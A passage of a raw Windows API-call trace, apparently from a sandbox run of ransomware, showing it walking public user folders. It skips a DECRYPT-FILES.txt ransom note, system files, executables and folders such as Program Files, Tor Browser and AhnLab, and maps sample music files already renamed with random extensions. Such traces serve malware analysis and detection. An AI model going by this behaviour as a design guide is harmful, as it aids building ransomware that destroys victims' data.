CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\0a16c9.tmp" (normalized: "c:\\users\\public\\music\\sample music\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.760] CloseHandle (hObject=0x0) returned 0 [0186.760] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.760] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0fc2840, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0fc2840, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0fc2840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.760] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.760] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.760] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.760] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.760] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.760] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.760] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb11d7b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8065f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kalimba.mp3.YF8Gf", cAlternateFileName="")) returned 1 [0186.760] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="DECRYPT-FILES.txt") returned 1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="autorun.inf") returned 1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="boot.ini") returned 1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="desktop.ini") returned 1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="ntuser.dat") returned -1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="iconcache.db") returned 1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="bootsect.bak") returned 1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="ntuser.dat.log") returned -1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="thumbs.db") returned -1 [0186.761] lstrcmpiW (lpString1="Kalimba.mp3.YF8Gf", lpString2="Bootfont.bin") returned 1 [0186.761] lstrlenW (lpString="Kalimba.mp3.YF8Gf") returned 17 [0186.761] lstrcmpiW (lpString1="YF8Gf", lpString2="lnk") returned 1 [0186.761] lstrcmpiW (lpString1="YF8Gf", lpString2="exe") returned 1 [0186.761] lstrcmpiW (lpString1="YF8Gf", lpString2="sys") returned 1 [0186.761] lstrcmpiW (lpString1="YF8Gf", lpString2="dll") returned 1 [0186.761] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.761] lstrlenW (lpString="Kalimba.mp3.YF8Gf") returned 17 [0186.761] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0186.761] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="Kalimba.mp3.YF8Gf" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.YF8Gf") returned="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.YF8Gf" [0186.761] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.764] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.YF8Gf" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.yf8gf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.765] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe0b0 | out: lpFileSize=0x36fe0b0*=8414713) returned 1 [0186.765] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0186.765] ReadFile (in: hFile=0x264, lpBuffer=0x36fe0bc, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x36fe0b8, lpOverlapped=0x0 | out: lpBuffer=0x36fe0bc*, lpNumberOfBytesRead=0x36fe0b8*=0x108, lpOverlapped=0x0) returned 1 [0186.767] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.767] CloseHandle (hObject=0x264) returned 1 [0186.767] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.767] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb132e7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3ec6da, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3.vcz5je", cAlternateFileName="MAIDWI~1.VCZ")) returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="DECRYPT-FILES.txt") returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="autorun.inf") returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="boot.ini") returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="desktop.ini") returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="ntuser.dat") returned -1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="iconcache.db") returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="bootsect.bak") returned 1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="ntuser.dat.log") returned -1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="thumbs.db") returned -1 [0186.767] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3.vcz5je", lpString2="Bootfont.bin") returned 1 [0186.767] lstrlenW (lpString="Maid with the Flaxen Hair.mp3.vcz5je") returned 36 [0186.767] lstrcmpiW (lpString1="vcz5je", lpString2="lnk") returned 1 [0186.767] lstrcmpiW (lpString1="vcz5je", lpString2="exe") returned 1 [0186.767] lstrcmpiW (lpString1="vcz5je", lpString2="sys") returned 1 [0186.767] lstrcmpiW (lpString1="vcz5je", lpString2="dll") returned 1 [0186.767] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.767] lstrlenW (lpString="Maid with the Flaxen Hair.mp3.vcz5je") returned 36 [0186.767] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0186.767] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="Maid with the Flaxen Hair.mp3.vcz5je" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.vcz5je") returned="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.vcz5je" [0186.767] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.768] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.vcz5je" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.vcz5je"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.768] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=4114138) returned 1 [0186.768] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.768] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.770] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.770] CloseHandle (hObject=0x268) returned 1 [0186.770] CloseHandle (hObject=0x264) returned 1 [0186.770] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.770] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb14ab5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x49e561, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3.mw3Q", cAlternateFileName="SLEEPA~1.MW3")) returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="DECRYPT-FILES.txt") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="autorun.inf") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="boot.ini") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="desktop.ini") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="ntuser.dat") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="iconcache.db") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="bootsect.bak") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="ntuser.dat.log") returned 1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="thumbs.db") returned -1 [0186.770] lstrcmpiW (lpString1="Sleep Away.mp3.mw3Q", lpString2="Bootfont.bin") returned 1 [0186.770] lstrlenW (lpString="Sleep Away.mp3.mw3Q") returned 19 [0186.770] lstrcmpiW (lpString1="mw3Q", lpString2="lnk") returned 1 [0186.771] lstrcmpiW (lpString1="mw3Q", lpString2="exe") returned 1 [0186.771] lstrcmpiW (lpString1="mw3Q", lpString2="sys") returned -1 [0186.771] lstrcmpiW (lpString1="mw3Q", lpString2="dll") returned 1 [0186.771] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.771] lstrlenW (lpString="Sleep Away.mp3.mw3Q") returned 19 [0186.771] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0186.771] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="Sleep Away.mp3.mw3Q" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mw3Q") returned="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mw3Q" [0186.771] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.771] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mw3Q" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.mw3q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.771] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=4842849) returned 1 [0186.771] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.771] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0186.772] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0186.772] CloseHandle (hObject=0x268) returned 1 [0186.772] CloseHandle (hObject=0x264) returned 1 [0186.772] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.773] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xb14ab5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x49e561, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3.mw3Q", cAlternateFileName="SLEEPA~1.MW3")) returned 0 [0186.773] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.773] CloseHandle (hObject=0x25c) returned 1 [0186.773] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb14ab5a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb14ab5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music\\", cAlternateFileName="SAMPLE~1")) returned 0 [0186.773] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.773] CloseHandle (hObject=0x254) returned 1 [0186.773] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb14ab5a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb14ab5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0186.773] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0186.773] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0186.773] lstrcatW (in: lpString1="Pictures", lpString2="\\" | out: lpString1="Pictures\\") returned="Pictures\\" [0186.773] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\Program Files") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch=":\\Windows") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\Games\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\All Users") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.773] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="AhnLab") returned 0x0 [0186.774] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.774] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0186.774] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.774] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\\\0a16c9.tmp") returned 36 [0186.774] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.774] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0186.774] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.774] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\\\DECRYPT-FILES.txt") returned 43 [0186.774] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.774] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0186.774] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0186.774] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf208fd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf208fd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.774] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf208fd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf208fd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.774] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf201d920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf208fd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf208fd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.774] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.775] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.775] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.775] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.775] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.775] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.775] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.775] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0186.775] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.775] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0186.775] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Pictures\\0a16c9.tmp") returned="C:\\Users\\Public\\Pictures\\0a16c9.tmp" [0186.775] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.775] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\0a16c9.tmp" (normalized: "c:\\users\\public\\pictures\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.775] CloseHandle (hObject=0x0) returned 0 [0186.775] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.775] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f76580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.775] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.775] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.775] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.775] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.775] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.776] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.776] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb16e6a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb16e6a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0186.776] lstrcmpW (lpString1="Sample Pictures", lpString2=".") returned 1 [0186.776] lstrcmpW (lpString1="Sample Pictures", lpString2="..") returned 1 [0186.776] lstrcatW (in: lpString1="Sample Pictures", lpString2="\\" | out: lpString1="Sample Pictures\\") returned="Sample Pictures\\" [0186.776] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\Program Files") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch=":\\Windows") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\Games\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.776] StrStrW (lpFirst="C:\\Users\\Public\\Pictures\\Sample Pictures\\", 